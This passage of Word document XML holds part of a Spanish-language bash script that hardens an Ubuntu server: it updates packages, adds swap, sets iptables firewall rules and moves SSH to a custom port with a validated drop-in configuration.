          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    - Hetzner: Firewalls &gt; (tu firewall) &gt; Reglas de entrada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    - Oracle:  Networking &gt; VCN &gt; Subnet &gt; Security List &gt; Ingress Rule</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    - AWS:     EC2 &gt; Security Groups &gt; Inbound rules</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Si el puerto $SSH_PORT no esta abierto ahi, perderas el acceso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">read -rp "  El puerto $SSH_PORT ya esta abierto en el firewall del proveedor? (si/no): " ok</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[[ "$ok" == "si" ]] || die "Abrelo primero y vuelve a ejecutar el script."</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--- 1. Sistema --------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">info "Actualizando el sistema..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">export DEBIAN_FRONTEND=noninteractive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get update -q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get upgrade -yq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get install -yq iptables-persistent unattended-upgrades</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">dpkg-reconfigure -f noninteractive unattended-upgrades</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--- 2. Swap (instancias pequenas, p. ej. E2.1.Micro con 1 GB) ---------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">mem_mb=$(awk '/MemTotal/ {print int($2/1024)}' /proc/meminfo)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">if (( mem_mb &lt; 2048 )) &amp;&amp; ! swapon --show | grep -q .; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  info "RAM de ${mem_mb} MB: creando 2 GB de swap..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  fallocate -l 2G /swapfile &amp;&amp; chmod 600 /swapfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  mkswap /swapfile &amp;&amp; swapon /swapfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  grep -q '^/swapfile' /etc/fstab || echo '/swapfile none swap sw 0 0' &gt;&gt; /etc/fstab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">fi</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--- 3. Firewall (iptables) --------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Se usa iptables y no UFW: las imagenes Ubuntu de Oracle ya traen reglas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># en /etc/iptables/rules.v4 (incluidas las de los servicios internos de</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># OCI en 169.254.0.0/16) y UFW gestionaria las mismas tablas en paralelo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">info "Configurando el firewall..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">if ufw status 2&gt;/dev/null | grep -q "Status: active"; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  warn "UFW estaba activo: se desactiva para no duplicar reglas."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  ufw disable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">fi</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ensure() {  # inserta la regla al principio solo si no existe ya</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  local chain=$1; shift</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  iptables -C "$chain" "$@" 2&gt;/dev/null || iptables -I "$chain" 1 "$@"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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Si la cadena INPUT no tiene ya un "denegar todo" (p. ej. Hetzner o AWS),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># se crea la base: trafico establecido, loopback, ICMP, 22 y rechazo final.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">if ! iptables -S INPUT | grep -qE -- '-j (REJECT|DROP)$|-j REJECT --reject-with'; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  iptables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  iptables -A INPUT -i lo -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  iptables -A INPUT -p icmp -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  iptables -A INPUT -j REJECT --reject-with icmp-host-prohibited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">fi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ensure INPUT -p tcp --dport "$SSH_PORT" -m conntrack --ctstate NEW -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">netfilter-persistent save</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--- 4. SSH ------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">info "Configurando SSH en el puerto $SSH_PORT..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># "Port" se acumula entre ficheros: si sshd_config fija el 22, se comenta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">sed -i -E 's/^\s*Port\s+/#&amp;/' /etc/ssh/sshd_config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">sed "s/__ADMIN_USER__/$ADMIN_USER/" "$SCRIPT_DIR/sshd_hardening.conf" &gt; "$DROPIN"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 644 "$DROPIN"</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Ubuntu 24.04 arranca sshd por socket y /run/sshd solo existe mientras el</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># servicio corre; "sshd -t" falla sin ella aunque la configuracion este bien.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">install -d -m 0755 /run/sshd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">if ! sshd -t; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  rm -f "$DROPIN"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
